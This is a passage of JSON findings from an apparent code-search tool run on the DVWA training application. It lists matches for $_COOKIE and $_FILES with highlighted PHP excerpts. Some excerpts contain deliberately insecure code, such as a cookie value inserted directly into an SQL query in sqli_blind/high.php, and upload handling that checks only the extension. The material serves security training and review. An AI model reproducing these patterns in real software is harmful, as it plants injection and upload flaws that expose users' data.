string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 213,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$method</span> <span class=\"token operator\">=</span> <span class=\"token string\">'GET'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 18,
"start": 13,
"end": 24,
"severity": "unknown",
"note": ""
},
{
"id": 214,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 215,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 251,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'upload'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 282,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'xss_r'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 293,
"file": "/home/chris/src/DVWA-master/vulnerabilities/xss_s/index.php",
"filetype": "php",
"search": "\\s\\$_COOKIE",
"match": "<span class=\"line-number\">12:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'source_button'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'xss_s'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> <span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">17:</span> <span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$vulnerabilityFile</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 252,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 6,
"start": 1,
"end": 12,
"severity": "unknown",
"note": ""
},
{
"id": 253,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 254,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpeg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 255,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpeg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\"><</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token function\">getimagesize</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_tmp</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 257,
"file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_FILES",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span> <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token 